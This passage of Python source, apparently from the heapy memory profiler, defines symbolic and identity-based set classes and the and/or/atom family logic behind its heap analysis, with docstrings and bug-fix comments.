        method should call env.failed(message), and return whatever may
        be returned; though typically env.failed() would raise an exception.
        """
        return self.fam.c_test_contains(self, element, env)

    biper = property_exp(lambda self: self.fam.c_get_biper(self),
                         doc="""\
A bipartitioning equivalence relation based on x. This may be used to
partition or classify sets into two equivalence classes:
    x.biper(0) == x
        The set of elements that are in x.
    x.biper(1) == ~x
        The set of elements that are not in x.
""")

    dictof = property_exp(lambda self: self.fam.c_get_dictof(self),
                          doc="""dictof: UniSet
If x represents a kind of objects with a builtin __dict__ attribute,
x.dictof is the kind representing the set of all those dict
objects. In effect, x.dictof maps lambda e:getattr(e, '__dict__') for
all objects e in x. But it is symbolically evaluated to generate a new
symbolic set (a Kind).""")
class Kind(UniSet):
    """A symbolic set defined by a family plus a family-specific
    argument (``arg``), e.g. 'all objects of type T'."""
    __slots__ = 'arg',

    def __init__(self, fam, arg):
        self.fam = fam
        self._hiding_tag_ = fam._hiding_tag_
        self.arg = arg
        self._origin_ = None

    def alt(self, cmp):
        # Derive an alternative kind using comparator `cmp` (family-defined).
        return self.fam.c_alt(self, cmp)
class IdentitySet(UniSet):
    """A set of actual heap objects, identified by address.

    FIX: the ``shpaths`` property was defined twice; the first definition
    was silently overwritten and the surviving one carried the docstring
    of ``sp``. The duplicate is removed below.
    """
    __slots__ = '_er', '_partition', '_more'
    _help_url_ = 'heapy_UniSet.html#heapykinds.IdentitySet'

    def __init__(self, fam):
        self.fam = fam
        self._hiding_tag_ = fam._hiding_tag_
        self._origin_ = None

    def __getitem__(self, idx): return self.fam.c_getitem(self, idx)
    def __len__(self): return self.fam.c_len(self)
    def __iter__(self): return self.fam.c_iter(self)

    def __str__(self):
        """
        Return a string representating self. This differs from the .brief
        attribute in that it is a tabular representation.
        ...
        """
        return self.fam.c_str(self)

    def get_rp(self, depth=None, er=None, imdom=0, bf=0, src=None,
               stopkind=None, nocyc=False, ref=None):
        """
        x.get_rp(depth=None, er=None, imdom=0, bf=0, src=None, stopkind=None,
                 nocyc=False, ref=None)
        Return an object representing the pattern of references to the objects in X.
        The returned object is of kind ReferencePattern.
        Arguments
            depth       The depth to which the pattern will be generated. The
                        default is taken from depth of this module.
            er          The equivalence relation to partition the referrers.
                        The default is Clodo.
            imdom       If true, the immediate dominators will be used instead
                        of the referrers. This will take longer time to
                        calculate, but may be useful to reduce the complexity
                        of the reference pattern.
            bf          If true, the pattern will be printed in breadth-first
                        order instead of depth-first. (Experimental.)
            src         If specified, an alternative reference source instead
                        of the default root.
            stopkind    The referrers of objects of kind stopkind will not be
                        followed.
            nocyc       When True, certain cycles will not be followed.
            ref
        See also
            rp (a shorthand for common cases)
        """
        return self.fam.RefPat.rp(self, depth, er, imdom, bf, src, stopkind,
                                  nocyc, ref)

    def get_shpaths(self, src=None, avoid_nodes=None, avoid_edges=()):
        """x.get_shpaths(draw:[src, avoid_nodes, avoid_edges]) -> Paths
        Return an object containing the shortest paths to objects in x.
        The optional arguments are:
            src:IdentitySet          An alternative source set of objects
            avoid_nodes:IdentitySet  Nodes to avoid
            avoid_edges:NodeGraph    Edges to avoid
        """
        return self.fam.Path.shpaths(self, src, avoid_nodes, avoid_edges)

    # 'Normal' methods
    def by(self, er):
        """ x.by(er) -> A copy of x, but using er for equiv. relation. """
        return self.fam.get_by(self, er)

    def diff(self, other):
        # Statistical difference against `other`, partitioned by self's er.
        return self.stat - other.by(self.er).stat

    def dump(self, *args, **kwds):
        """ Dump statistical data to a file
        Shorthand for .stat.dump """
        self.stat.dump(*args, **kwds)

    byclodo = property_exp(lambda self: self.by('Clodo'), doc="""\
A copy of self, but with 'Clodo' as the equivalence relation.""")
    byidset = property_exp(lambda self: self.by('Idset'), doc="""\
A copy of self, but with 'Idset' as the equivalence relation.
Note
    This is mainly for special purpose internal use. The Id
    equivalence relation is more efficient when partitioning large
    sets.""")
    byid = property_exp(lambda self: self.by('Id'), doc="""\
A copy of self, but with 'Id' as the equivalence relation.""")
    bymodule = property_exp(lambda self: self.by('Module'), doc="""\
A copy of self, but with 'Module' as the equivalence relation.""")
    byprod = property_exp(lambda self: self.by('Prod'), doc="""\
A copy of self, but with 'Prod' as the equivalence relation.""")
    byrcs = property_exp(lambda self: self.by('Rcs'), doc="""\
A copy of self, but with 'Rcs' as the equivalence relation.""")
    bysize = property_exp(lambda self: self.by('Size'), doc="""\
A copy of self, but with 'Size' as the equivalence relation.""")
    bytype = property_exp(lambda self: self.by('Type'), doc="""\
A copy of self, but with 'Type' as the equivalence relation.""")
    byunity = property_exp(lambda self: self.by('Unity'), doc="""\
A copy of self, but with 'Unity' as the equivalence relation.""")
    byvia = property_exp(lambda self: self.by('Via'), doc="""
A copy of self, but with 'Via' as the equivalence relation.""")

    er = property_exp(lambda self: self.fam.get_er(self), doc="""\
The equivalence relation used for partitioning when representing /
printing this set.""")
    count = property_exp(lambda self: len(self.nodes), doc="""\
The number of individual objects in the set.""")
    dominos = property_exp(lambda self: self.fam.View.dominos(self), doc="""\
The set 'dominated' by a set of objects. This is the objects that will
become deallocated, directly or indirectly, when the objects in the
set are deallocated.
See also: domisize.""")
    domisize = property_exp(lambda self: self.fam.View.domisize(self), doc="""\
The dominated size of a set of objects. This is the total size of
memory that will become deallocated, directly or indirectly, when the
objects in the set are deallocated.
See also: dominos, size.
""")
    imdom = property_exp(lambda self: self.fam.View.imdom(self), doc="""\
The immediate dominators of a set of objects. The immediate dominators
is a subset of the referrers. It includes only those referrers that
are reachable directly, avoiding any other referrer.""")
    indisize = size = property_exp(lambda self: self.fam.View.indisize(self), doc="""\
The total 'individual' size of the set of objects. The individual
size of an object is the size of memory that is allocated directly in
the object, not including any externally visible subobjects. See also:
domisize.""")
    kind = property_exp(lambda self: self.er[self], doc="""\
The kind of objects in the set. The kind is the union of the
element-wise classifications as determined by the equivalence relation
in use by the set.""")
    maprox = property_exp(lambda self: MappingProxy(self), doc="""\
An object that can be used to map operations to the objects in self,
forming a new set of the result. The returned object is an instance of
MappingProxy.
This works currently as follows:
o Getting an attribute of the MappingProxy object will get the
  attribute from each of the objects in the set and form a set of the
  results. If there was an exception when getting some attribute, it
  would be ignored.
o Indexing the MappingProxy object will index into each of the objects
  in the set and return a set of the results. Exceptions will be
  ignored.
Example:
    >>> hp.iso({'a':'b'}, {'a':1}).maprox['a'].byid
    Set of 2 objects. Total size = 40 bytes.
     Index     Size   %   Cumulative  %   Kind: Name/Value/Address
         0       28  70.0        28  70.0 str: 'b'
         1       12  30.0        40 100.0 int: 1
    >>>
<This is an experimental feature, so the name is intentionally made
mystically-sounding, and is a shorthand for 'mapping proxy'.>""")
    more = property_exp(lambda self: self.fam.get_more(self), doc="""\
An object that can be used to show more lines of the string
representation of self. The object returned, a MorePrinter instance,
has a string representation that continues after the end of the
representation of self.""")
    all = property_exp(lambda self: self.fam.get_all(self), doc="""\
An object that can be used to show all lines of the string
representation of self.""")
    owners = property_exp(lambda self: self.fam.get_owners(self), doc="""\
The set of objects that 'own' objects in self. The owner is defined
for an object of type dict, as the object (if any) that refers to the
object via its special __dict__ attribute.""")
    partition = property_exp(lambda self: self.fam.get_partition(self), doc="""\
A partition of the set of objects in self. The set is partitioned into
subsets by equal kind, as given by a equivalence relation. Unless
otherwise specified, the equivalence relation used is 'byclodo', which
means it classifies 'by type or dict owner'. Different
equivalence relations are specified for sets created by the 'by_...'
attributes of any IdentitySet object.
The value is an instance of guppy.heapy.Part.Partition.""")
    parts = property_exp(lambda self: self.fam.get_parts(self), doc="""\
An iterable object, that can be used to iterate over the 'parts' of
self. The iteration order is determined by the sorting order the set
has, in the table printed when partitioned.""")
    pathsin = property_exp(lambda self: self.get_shpaths(self.referrers), doc="""\
The paths from the direct referrers of the objects in self.""")
    pathsout = property_exp(lambda self: self.referents.get_shpaths(self), doc="""\
The paths to the referents of the objects in self.""")
    referents = property_exp(lambda self: self.fam.View.referents(self), doc="""\
The set of objects that are directly referred to by any of the objects
in self.""")
    referrers = property_exp(lambda self: self.fam.View.referrers(self), doc="""\
The set of objects that directly refer to any of the objects in self.""")
    rp = property_exp(get_rp, doc="""\
rp: ReferencePattern
An object representing the pattern of references to the objects in X.
See also
    get_rp""")
    # Single definition of shpaths (formerly defined twice; the first
    # definition was dead and the survivor had sp's doc header).
    shpaths = property_exp(get_shpaths, doc="""x.shpaths: Paths
An object containing the shortest paths to objects in x.
Synonym
    sp
See also
    get_shpaths""")
    sp = property_exp(get_shpaths, doc="""x.sp: Paths
An object containing the shortest paths to objects in x.
Synonym
    shpaths
See also
    get_shpaths""")
    stat = property_exp(lambda self: self.partition.get_stat(), doc="""\
x.stat: Stat
An object summarizing the statistics of the partitioning of x. This is
useful when only the statistics is required, not the objects
themselves. The statistics can be dumped to a file, unlike the set of
objects itself.""")
    theone = property_exp(lambda self: self.fam.get_theone(self), doc="""\
theone: Anything
The one object in a singleton set. In case the set does not contain
exactly one object, the exception ValueError will be raised.
""")
    prod = property_exp(lambda self: self.fam.get_prod(self), doc="""\
theone: MorePrinter
The traceback for the producer for the one object in a singleton set.
""")
class IdentitySetMulti(IdentitySet):
    # IdentitySet backed by a node set; used for sets holding any number
    # of objects (the singleton case has its own class below).
    __slots__ = 'nodes',
    def __init__(self, fam, nodes):
        # fam: the owning IdentitySetFamily; nodes: a node set of the
        # contained objects (identity-based membership).
        super().__init__(fam)
        self.nodes = nodes
class IdentitySetSingleton(IdentitySet):
    # IdentitySet specialized for exactly one object: stores the single
    # node directly and materializes a node set only on demand.
    __slots__ = '_node',
    _help_url_ = 'heapy_UniSet.html#heapykinds.IdentitySetSingleton'
    def __init__(self, fam, node):
        super().__init__(fam)
        self._node = node
        # RefPat (eg) depends on this being usable as a hashable key.
    nodes = property_exp(lambda self: self.fam.immnodeset((self._node,)), doc="""\
x.nodes: ImmNodeSet
The actual objects contained in x. These are called nodes because they
are treated with equality based on address, and not on the generalized
equality that is used by ordinary builtin sets or dicts.""")
    def _get_theone(self):
        # Fast path: the one object is stored directly, no set needed.
        return self._node
    theone = property_exp(_get_theone)
class EquivalenceRelation(UniSet):
    """\
An equivalence relation is a binary relation between two elements of a
set which groups them together as being "equivalent" in some way.
An equivalence relation is reflexive, symmetric, and transitive. In
other words, the following must hold for "~" to be an equivalence
relation on X:
* Reflexivity: a ~ a
* Symmetry: if a ~ b then b ~ a
* Transitivity: if a ~ b and b ~ c then a ~ c.
An equivalence relation partitions a set into several disjoint
subsets, called equivalence classes. All the elements in a given
equivalence class are equivalent among themselves, and no element is
equivalent with any element from a different class.
"""
    __slots__ = 'classifier', 'erargs'
    _help_url_ = 'heapy_UniSet.html#heapykinds.EquivalenceRelation'
    def __init__(self, fam, classifier, erargs=()):
        # classifier: the classifier object this relation is based on
        # (1-1 with the relation, see EquivalenceRelationFamily.__call__).
        # erargs: the component relations when this was built as an
        # intersection of several relations (see c_and there).
        self.fam = fam
        self._hiding_tag_ = fam._hiding_tag_
        self.classifier = classifier
        self.erargs = erargs
        self._origin_ = None
    def __getitem__(self, idx):
        # Delegate indexing to the family (relational image of a node set).
        return self.fam.c_getitem(self, idx)
    def _get_dictof(self):
        return self.fam.Classifiers.mker_dictof(self)
    dictof = property_exp(_get_dictof)
    def _get_refdby(self):
        return self.fam.Classifiers.mker_refdby(self)
    refdby = property_exp(_get_refdby)
    def sokind(self, *args, **kwds):
        # Set-of-kind constructor provided by the underlying classifier.
        return self.classifier.get_sokind(self, *args, **kwds)
class MappingProxy(object):
    """Attribute/item proxy around a set.

    Every attribute access (except the backing '_set_' slot itself) and
    every item access is forwarded to the set's family via
    maprox_getattr / maprox_getitem.
    """
    __slots__ = ('_set_',)

    def __init__(self, target):
        self._set_ = target

    def __getattribute__(self, name):
        # Fetch the backing set without re-entering this method's
        # forwarding logic.
        inner = object.__getattribute__(self, '_set_')
        if name == '_set_':
            return inner
        return inner.fam.maprox_getattr(inner, name)

    def __getitem__(self, key):
        inner = object.__getattribute__(self, '_set_')
        return inner.fam.maprox_getitem(inner, key)
class Family:
    # Base class for set-operation "families".  Each UniSet delegates its
    # operators to its family; binary operations double-dispatch through
    # the c_<op> entry points into _<op>_<OPNAME> handlers defined on the
    # other operand's family.
    supercl = None
    def __init__(self, mod):
        # mod is the UniSet glue module; cache its frequently used parts.
        self.mod = mod
        self.Doc = mod._parent.Doc
        self._hiding_tag_ = mod._hiding_tag_
        self.types = mod.types
        self.disjoints = mod.immnodeset()
        self.export_dict = self.mod.export_dict
        self.supers = mod.immnodeset([self])
        self.Set = Kind
    def __call__(self, arg):
        # Construct a set of this family wrapping arg.
        return self.Set(self, arg)
    def _derive_origin_(self, origin):
        return self.Doc.add_origin(self, origin)
    def specotup(self, tup):
        # Construct from a tuple arg, recording a call-style origin.
        r = self.Set(self, tup)
        r = self.Doc.add_origin(r, self.Doc.callfunc(self, *tup))
        return r
    def specoarg(self, arg):
        # Construct from a single arg, recording a call-style origin.
        r = self.Set(self, arg)
        r = self.Doc.add_origin(r, self.Doc.callfunc(self, arg))
        return r
    def specoargtup(self, arg, tup):
        # Construct from arg, but document the origin with tup's items.
        r = self.Set(self, arg)
        r = self.Doc.add_origin(r, self.Doc.callfunc(self, *tup))
        return r
    def add_export(self, name, value):
        # Register an exported attribute; copy-on-write the shared module
        # export dict the first time this family adds one of its own.
        if self.export_dict is self.mod.export_dict:
            self.export_dict = self.mod.export_dict.copy()
        if name in self.export_dict and self.export_dict[name] is not value:
            raise ValueError('Duplicate: %s' % name)
        self.export_dict[name] = value
    def c_alt(self, a, cmp):
        raise ValueError('No alternative set for family %s.' % self)
    def c_binop(self, op, a, b):
        # Generic binary-operator entry: coerce b to a UniSet, then
        # dispatch to the family-specific c_<op> handler.
        if not isinstance(b, UniSet):
            b = self.c_uniset(b)
        r = getattr(self, 'c_'+op)(a, b)
        # r = self.Doc.add_origin(r, self.Doc.binop(op, a.doc, b.doc))
        return r
    def c_unop(self, op, a):
        r = getattr(self, 'c_'+op)(a)
        # r = self.Doc.add_origin(r, self.Doc.unop(op, a.doc))
        return r
    def c_derive_origin(self, a, b):
        return self.Doc.add_origin(a, b)
    def c_call(self, a, args, kwds):
        raise ValueError('Not callable set')
    def c_contains(self, a, b):
        # Default membership test: intersect with the singleton of b.
        mod = self.mod
        return (a & mod.iso(b)) is not mod.Nothing
    def c_get_biper(self, a):
        return self.mod.Classifiers.biper(a)
    def c_get_dictof(self, a):
        return self.mod.Classifiers.dictof(a)
    def c_disjoint(self, a, b):
        # Determine if a, b are disjoint
        return (a & b) is self.mod.Nothing
    def c_factordisjoint(self, a, b):
        # Given a and b factors, and not a <= b and not b <= a,
        # determine if they are disjoint
        return getattr(self, '_factordisjoint_%s' % (b.fam.opname,))(a, b)
    def c_get_brief_alt(self, a, alt):
        return '[%s %s]' % (alt, self.c_get_brief(a))
    def c_uniset(self, X):
        return self.mod.uniset_from_setcastable(X)
    def c_get_examples(self, a, env):
        # Default: no examples known for this family.
        return []
    def c_getattr(self, a, b, args=(), kwds={}):
        # Attribute access on a set: exported names take precedence,
        # everything else falls through to c_getattr2.
        d = self.export_dict
        if b in d:
            return d[b](a, *args, **kwds)
        return self.c_getattr2(a, b)
    def c_getattr2(self, a, b):
        raise AttributeError(b)
    def c_get_render(self, a):
        return self.mod.summary_str.str_address
    def c_get_str_for(self, a, b):
        # A modification of str, for some cases,
        # when the set a is used as a determination of an idset b
        # Normally the same as brief, but.. 'dict of' will be different for eg module
        return a.brief
    def c_get_idpart_header(self, a):
        render = a.get_render()
        # NOTE(review): 'im_func' is the Python 2 name; Python 3 bound
        # methods forward attribute reads to __func__, so the fallback to
        # 'render' still finds _idpart_header — confirm before changing.
        h = getattr(render, 'im_func', render)
        h = getattr(h, '_idpart_header', None)
        if not h:
            h = 'Value'
        return h
    def c_get_idpart_label(self, a):
        return '<%s>' % a
    def c_get_idpart_render(self, a):
        return self.c_get_render(a)
    def c_get_idpart_sortrender(self, a):
        render = self.c_get_idpart_render(a)
        if render is repr:
            return 'IDENTITY'
        h = getattr(render, 'im_func', render)
        render = getattr(h, '_idpart_sortrender', render)
        return render
    def c_hash(self, a):
        return hash(a.arg)
    def c_iter(self, a):
        raise TypeError('iteration over non-sequence')
    def c_len(self, a):
        raise TypeError('len() of unsized object')
    def c_nonzero(self, a):
        # By default, any set of this family is truthy.
        return True
    def c_mul(self, a, b):
        return self.mod._parent.Spec.cprod(a, b)
    def c_lshift(self, a, b):
        return self.Doc.add_origin(self.c_map(a, b), self.Doc.binop('lshift', a, b))
    def c_map(self, a, b):
        # Build a Spec mapping 'b -> a'; b may be given as a single
        # argument or a sequence of arguments.
        if isinstance(b, list):
            b = tuple(b)
        if not isinstance(b, tuple):
            b = b,
        t = b + ('->', a)
        return self.mod._parent.Spec.mapping(*t)
    def c_repr(self, a):
        return self.c_str(a)
    def c_str(self, a):
        return self.c_get_brief(a)
    def c_sub(self, a, b):
        # Set difference in terms of intersection with the complement.
        return a & ~b
    def c_test_contains(self, a, b, env):
        if not self.c_contains(a, b):
            return env.failed('%s: %s does not contain %s' % (self.__class__, env.name(a), env.name(b)))
        return True
    def c_xor(self, a, b):
        # Symmetric difference.
        return (a - b) | (b - a)
    def _or_OR(self, a, b):
        return b.fam._or_TERM(b, a)
    def _rand_ATOM(self, a, b):
        return self._and_ATOM(a, b)
class AtomFamily(Family):
    """Family of 'atomic' sets: indivisible factors in the and/or/invert
    normal form maintained by the set algebra."""
    isatom = True
    isfactor = True
    opname = 'ATOM'
    def __init__(self, mod):
        Family.__init__(self, mod)
        # Atom families participate in disjointness checks against
        # themselves; subclasses extend this via defdisjoint().
        self.disjoints |= [self]
    def c_and(self, a, b):
        return b.fam._and_ATOM(b, a)
    def _and_ATOM(self, a, b):
        return self.mod.fam_And(a, b)
    def _and_AND(self, a, b):
        return b.fam._and_ATOM(b, a)
    def _and_FACTOR(self, a, b):
        return self.mod.fam_And(a, b)
    def _and_INVERT(self, a, b):
        return b.fam._and_ATOM(b, a)
    def _factordisjoint_ATOM(self, a, b):
        # Atoms are disjoint when one family was declared disjoint from a
        # superfamily of the other.
        return (a.fam.disjoints & b.fam.supers or
                b.fam.disjoints & a.fam.supers)
    def _factordisjoint_INVERT(self, a, b):
        return b.fam._factordisjoint_ATOM(b, a)
    def c_le(self, a, b):
        return b.fam._ge_ATOM(b, a)
    # FIX: this chain previously read "_le_AND = _le_INVERT = _le_AND = c_le",
    # naming _le_AND twice; it now mirrors the _ge_* chain below.
    # (_le_ATOM has its own definition and is intentionally not aliased.)
    _le_INVERT = _le_AND = c_le
    def _le_ATOM(self, a, b):
        # b is known to not be Nothing since its c_ge doesn't call back
        return self.supercl is not None and self.supercl <= b
    def c_ge(self, a, b):
        return b.fam._le_ATOM(b, a)
    _ge_INVERT = _ge_AND = c_ge
    def _ge_ATOM(self, a, b):
        # b is known to not be Nothing since its c_le doesn't call back
        return b.fam.supercl is not None and b.fam.supercl <= a
    def c_or(self, a, b):
        return b.fam._or_ATOM(b, a)
    def _or_ATOM(self, a, b):
        return self.mod.fam_Or(a, b)
    _or_AND = _or_INVERT = c_or
    def c_invert(self, a):
        return self.mod.fam_Invert(a)
    def defrefining(self, arg):
        # Declare that sets of this family refine (are subsets of) arg.
        self.supercl = arg
        self.supers |= arg.fam.supers
    def defdisjoint(self, *args):
        # Define disjointness of sets under the condition that
        # neither of them is a subset of the other (determined in some other way.)
        # I.E., define that there is no partial overlap.
        # Declare that all sets of my (self) family are disjoint under this condition
        # from all sets of each family in args.
        self.disjoints |= args
        sc = self.supercl
        if sc is not None:
            self.disjoints |= sc.fam.disjoints
    def defrefidis(self, arg):
        # Shorthand: refine arg and declare disjointness from its family.
        self.defrefining(arg)
        self.defdisjoint(arg.fam)
    def fam_union(self):
        return self.supercl
class ArgAtomFamily(AtomFamily):
    # Atom family whose sets are determined by an argument value that a
    # classifier can compare with '==' (see c_get_ckc).
    def _and_ID(self, a, b):
        # Intersect with an identity set by selecting the ids that
        # classify equal to a's argument.
        cla, k, cmp = self.c_get_ckc(a)
        return cla.select_ids(b, k, cmp)
    def _ge_ATOM(self, a, b):
        # b is known to not be Nothing since its c_le doesn't call back
        if self is b.fam:
            return a.arg == b.arg
        return b.fam.supercl is not None and b.fam.supercl <= a
    def _le_ATOM(self, a, b):
        # b is known to not be Nothing since its c_ge doesn't call back
        if self is b.fam:
            return a.arg == b.arg
        return self.supercl is not None and self.supercl <= b
    def c_get_ckc(self, a):
        # (classifier, key, comparator) triple characterizing this set.
        return self.classifier, a.arg, '=='
class AndFamily(Family):
    """Family of intersections: a set holds a tuple of factors (atoms or
    inverted atoms) whose conjunction it represents."""
    opname = 'AND'
    isatom = False
    isfactor = False
    def __call__(self, a, b):
        # Normalize trivial cases before constructing an AND node.
        if a <= b:
            return a
        if b <= a:
            return b
        if a.fam.c_factordisjoint(a, b):
            return self.mod.Nothing
        return self._cons((a, b))
    def _cons(self, arg):
        # We allow explicit non-normalized constructions, as an optimization
        # for a in arg:
        #    assert a.fam.isatom or isinstance(a.fam, InvertFamily)
        if len(arg) > 1:
            return self.Set(self, tuple(arg))
        elif len(arg) == 1:
            return arg[0]
        else:
            return self.mod.Nothing
    def c_get_examples(self, a, env):
        # Examples of the intersection: examples of one factor that every
        # other factor also contains.
        ex = []
        for ai in a.arg:
            try:
                e = env.get_examples(ai)
            except CoverageError:
                pass
            else:
                for ei in list(e):
                    for aj in a.arg:
                        if aj is not ai:
                            if not env.contains(aj, ei):
                                break
                    else:
                        ex.append(ei)
        return ex
    def c_and(self, a, b):
        return b.fam._and_AND(b, a)
    def _and_AND(self, a, b):
        # Fold b's factors into a one by one.
        for b in b.arg:
            a &= b
        return a
    def _and_FACTOR(self, a, b):
        # a0 & a1 & ... & b
        xs = []
        for ai in a.arg:
            if ai <= b:
                return a
            elif b <= ai:
                pass
            elif ai.fam.c_factordisjoint(ai, b):
                return self.mod.Nothing
            else:
                xs.append(ai)
        xs.append(b)
        return self._cons(xs)
    _and_ATOM = _and_INVERT = _and_FACTOR
    def _and_ID(self, a, b):
        # Intersect with an identity set: narrow b by each factor in turn.
        b = a.arg[0] & b
        for a in a.arg[1:]:
            if b is self.mod.Nothing:
                break
            b = a & b
        return b
    def c_le(self, a, b):
        return b.fam._ge_AND(b, a)
    def _le_TERM(self, a, b):
        # a <= b iff intersecting with b leaves a's factor structure
        # intact (each factor bounded by some factor of the result).
        b = a & b
        if b.fam is not self or len(b.arg) != len(a.arg):
            return False
        for x in a.arg:
            for y in b.arg:
                if x <= y:
                    break
            else:
                return False
        return True
    _le_ATOM = _le_INVERT = _le_AND = _le_TERM
    def c_ge(self, a, b):
        return b.fam._le_AND(b, a)
    def _ge_TERM(self, a, b):
        # An intersection contains b iff every factor contains b.
        for a in a.arg:
            if not a >= b:
                return False
        return True
    _ge_ATOM = _ge_INVERT = _ge_AND = _ge_TERM
    def c_or(self, a, b):
        return b.fam._or_AND(b, a)
    def _or_AND(self, a, b):
        # a0 & a1 ... | b0 & b1 ...
        # Absorption: if one factor pair covers everything and the
        # remainders agree, the union collapses to that remainder.
        Omega = ~self.mod.Nothing
        for i, ai in enumerate(a.arg):
            for j, bj in enumerate(b.arg):
                if ai | bj == Omega:
                    aa = self._cons(a.arg[:i] + a.arg[i+1:])
                    bb = self._cons(b.arg[:j] + b.arg[j+1:])
                    if aa == bb:
                        return aa
        return self.mod.fam_Or(a, b)
    def _or_TERM(self, a, b):
        # a0 & a1 ... | b
        if a <= b:
            return b
        if b <= a:
            return a
        xs = []
        for ai in a.arg:
            aib = ai | b
            if aib.fam.isfactor:
                xs.append(aib)
            else:
                break
        else:
            # Distribution succeeded: rebuild as an intersection.
            r = ~self.mod.Nothing
            for x in xs:
                r &= x
            return r
        return self.mod.fam_Or(a, b)
    _or_ATOM = _or_INVERT = _or_TERM
    def c_invert(self, a):
        # ~(a0 & a1 ...) = ~a0 | ~a1 ...
        r = self.mod.Nothing
        for ai in a.arg:
            r |= ~ai
        return r
    def c_contains(self, a, b):
        for x in a.arg:
            if b not in x:
                return False
        return True
    def c_test_contains(self, a, b, env):
        for x in a.arg:
            if not env.test_contains(x, b, 'and'):
                return env.failed('Failed')
        return True
    def c_disjoint3(self, a, b):
        return (a & b) is self.mod.Nothing
    def c_get_render(self, c):
        # Use the first factor that knows how to render; fall back to
        # a plain address rendering.
        for kind in c.arg:
            r = kind.get_render()
            if r:
                return r
        def r(o):
            return hex(id(o))
        return r
    def c_get_brief(self, c):
        names = [kind.brief for kind in c.arg]
        # names.sort() ?? I think now I want them in given order.
        # BUG FIX: a stray "+ ')'" used to append an unbalanced closing
        # parenthesis (e.g. "(a & b))"); c_repr below shows the intended
        # single-pair form.
        return '(%s)' % ' & '.join(names)
    def c_get_ckc(self, a):
        return (
            self.mod.Classifiers.mker_and([x.biper for x in a.arg]).classifier,
            (0,)*len(a.arg),
            '=='
        )
    def c_repr(self, a):
        reprs = [repr(k) for k in a.arg]
        return '(%s)' % ' & '.join(reprs)
class OrFamily(Family):
    """Family of unions: a set holds a tuple of terms (factors or
    intersections) whose disjunction it represents."""
    opname = 'OR'
    isatom = False
    isfactor = False
    def __call__(self, a, b):
        # Normalize trivial subset cases before constructing an OR node.
        if b <= a:
            return a
        if a <= b:
            return b
        return self._cons((a, b))
    def _cons(self, arg):
        # Must only be called with maximalized args
        for a in arg:
            assert a.fam.isfactor or isinstance(a.fam, AndFamily)
        if len(arg) > 1:
            return Family.__call__(self, tuple(arg))
        elif len(arg) == 1:
            return arg[0]
        else:
            return self.mod.Nothing
    def c_contains(self, a, b):
        for x in a.arg:
            if b in x:
                return True
        return False
    def c_get_ckc(self, a):
        return self.mod.Use.findex(*a.arg).classifier, len(a.arg), '<'
    def c_get_examples(self, a, env):
        # Round-robin interleave examples from each term until all
        # generators are exhausted.
        exa = [iter(env.get_examples(x)) for x in a.arg]
        while 1:
            n = 0
            for i, e in enumerate(exa):
                if e is not None:
                    try:
                        yield next(e)
                    except StopIteration:
                        exa[i] = None
                    else:
                        n += 1
            if not n:
                break
    def c_test_contains(self, a, b, env):
        return env.forsome(a.arg, lambda x: env.test_contains(x, b, 'Some x'), 'or')
    def c_and(self, a, b):
        if self is b.fam:
            return self._and_OR(a, b)
        else:
            return self._and_TERM(a, b)
    def _and_TERM(self, a, b):
        # (a0 | a1 ..) & b = a0 & b | a1 & b | ...
        r = self.mod.Nothing
        for a in a.arg:
            r |= a & b
        return r
    _and_ATOM = _and_INVERT = _and_AND = _and_TERM
    def _and_OR(self, a, b):
        # (a0 | a1 ..) & (b0 | b1 ..) = a0 & b0 | a0 & b1 ... a1 & b0 | a1 & b1 ...
        r = self.mod.Nothing
        for a in a.arg:
            for bi in b.arg:
                r |= a & bi
        return r
    def _and_ID(self, a, b):
        # Intersect an identity set with each term and take the union.
        ai = a.arg[0]
        r = ai.fam._and_ID(ai, b)
        for ai in a.arg[1:]:
            r |= ai.fam._and_ID(ai, b)
        return r
    def _ge_TERM(self, a, b):
        a = a & b
        if a.fam is self:
            if b.fam is not a.fam or len(b.arg) != len(a.arg):
                return False
            assert 0
        else:
            return b <= a
    _ge_ATOM = _ge_INVERT = _ge_AND = _ge_TERM
    def c_ge(self, a, b):
        if b.fam is self:
            return self.c_le(b, a)
        else:
            return self._ge_TERM(a, b)
    def c_le(self, a, b):
        # A union is contained in b iff every term is.
        for x in a.arg:
            if not x <= b:
                return False
        return True
    _le_ATOM = _le_INVERT = _le_AND = c_le
    def c_or(self, a, b):
        return b.fam._or_OR(b, a)
    def _or_TERM(self, a, b):
        # a0 | a1 ... | b
        xs = []
        lt = False
        for a in a.arg:
            if not b >= a:
                xs.append(a)
            if b <= a:
                lt = True
        if not lt:
            xs.append(b)
        return self._cons(xs)
    _or_ATOM = _or_INVERT = _or_AND = _or_TERM
    def _or_OR(self, a, b):
        # (a0 | a1 ...) | (b0 | b1 ...)
        xs = maximals(a.arg + b.arg)
        return self._cons(xs)
    def c_invert(self, a):
        # ~(a0 | a1 ...) = ~a0 & ~a1 ...
        r = ~a.arg[0]
        for ai in a.arg[1:]:
            r &= ~ai
        return r
    def c_get_render(self, c):
        # If all terms agree on a renderer, use it; otherwise fall back
        # to rendering by address.
        renders = self.mod.mutnodeset([kind.get_render() for kind in c.arg])
        if len(renders) == 1:
            return list(renders)[0]
        else:
            def r(o):
                return hex(id(o))
            r._idpart_header = 'Address'
            r._idpart_sortrender = lambda x: id(x)
            return r
    def c_get_brief(self, c):
        names = [kind.brief for kind in c.arg]
        names.sort()
        return '(' + ' | '.join(names) + ')'
    def c_get_idpart_header(self, a):
        return 'Brief'
    def c_get_idpart_label(self, a):
        return '<mixed>'
    def c_get_idpart_render(self, a):
        # Render each object prefixed by its Clodo-classified kind,
        # memoizing (brief, renderer) per classification.
        er = self.mod.Use.Clodo
        cla = er.classifier
        cli = cla.cli
        brmemo = {}
        def render(x):
            k = cli.classify(x)
            br = brmemo.get(k)
            if br is None:
                kind = cla.get_kind(k)
                # FIX: reuse the already-fetched kind instead of calling
                # cla.get_kind(k) a second time.
                b = kind.brief
                r = kind.get_render()
                br = (b, r)
                brmemo[k] = br
            b, r = br
            return '%s: %s' % (b, r(x))
        return render
    def c_get_idpart_sortrender(self, a):
        # Like c_get_idpart_render but produces (brief, sortkey) pairs
        # suitable for ordering.
        er = self.mod.Use.Clodo
        cla = er.classifier
        cli = cla.cli
        brmemo = {}
        def render(x):
            k = cli.classify(x)
            br = brmemo.get(k)
            if br is None:
                kind = cla.get_kind(k)
                # FIX: reuse the already-fetched kind instead of calling
                # cla.get_kind(k) a second time.
                b = kind.brief
                r = kind.fam.c_get_idpart_sortrender(kind)
                br = (b, r)
                brmemo[k] = br
            else:
                b, r = br
            if r != 'IDENTITY':
                x = r(x)
            return (b, x)
        return render
    def c_repr(self, a):
